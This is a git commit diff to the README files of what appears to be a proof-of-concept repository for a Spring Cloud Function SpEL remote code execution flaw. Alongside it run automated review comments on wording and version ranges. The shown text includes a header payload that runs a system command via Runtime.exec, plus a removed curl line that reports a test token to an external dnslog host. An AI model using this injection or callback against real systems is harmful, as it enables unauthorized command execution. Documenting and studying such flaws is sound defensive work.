update readme

helloexp 2022-03-30 11:51:46 +08:00
parent eb33112b95
commit 2670bf1b6b
2 changed files with 11 additions and 7 deletions

View File

@ -7,6 +7,10 @@ header
``` ```
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
``` ```
## 受影响吧版本
SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2
# build # build
```bash ```bash
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
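Review bot: The added heading `## 受影响吧版本` contains a stray `吧`; it should read `## 受影响版本` (affected versions). The range on the next line, `SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2`, gives its lower bound only as `3`; write it as a full version number and link the source the range was taken from. Also leave a blank line between the closing code fence and the new heading, and between the version line and `# build`, so the section renders as its own block.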
@ -61,11 +65,5 @@ Content-Length: 5
helloexp helloexp
``` ```
## check
```bash
curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
```
## official GitHub info ## official GitHub info
https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
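Review bot: The `## check` section is deleted with no reason given, and the commit message `update readme` does not mention it. The removed `curl` line reported the test result to a fixed external host (`helloexp.com`), which discloses the tested target to a third party, so removing it is reasonable; record that in the commit message so readers can tell the step was dropped deliberately and not lost in an edit.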

View File

@ -9,3 +9,9 @@
## Spring 官方补丁也正在积极的赶制中 ## Spring 官方补丁也正在积极的赶制中
[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529) [Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
## 漏洞影响
1. jdk 版本在9及以上的
2. 使用了Spring Framework或衍生框架
## 漏洞修复建议
目前Spring 官方暂未发布补丁建议降低jdk 版本作为临时方案
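Review bot: The last added line, `目前Spring 官方暂未发布补丁建议降低jdk 版本作为临时方案`, is time-sensitive and will be wrong as soon as a release ships; add the date it was written and point to the in-progress patch commit linked two lines above, so readers know to check for a fixed release before downgrading the JDK. The line also runs two sentences together: insert punctuation between `补丁` and `建议`. In the `## 漏洞影响` list, state whether items 1 and 2 must both hold or whether either one is enough, and write `JDK 9` with consistent casing and spacing.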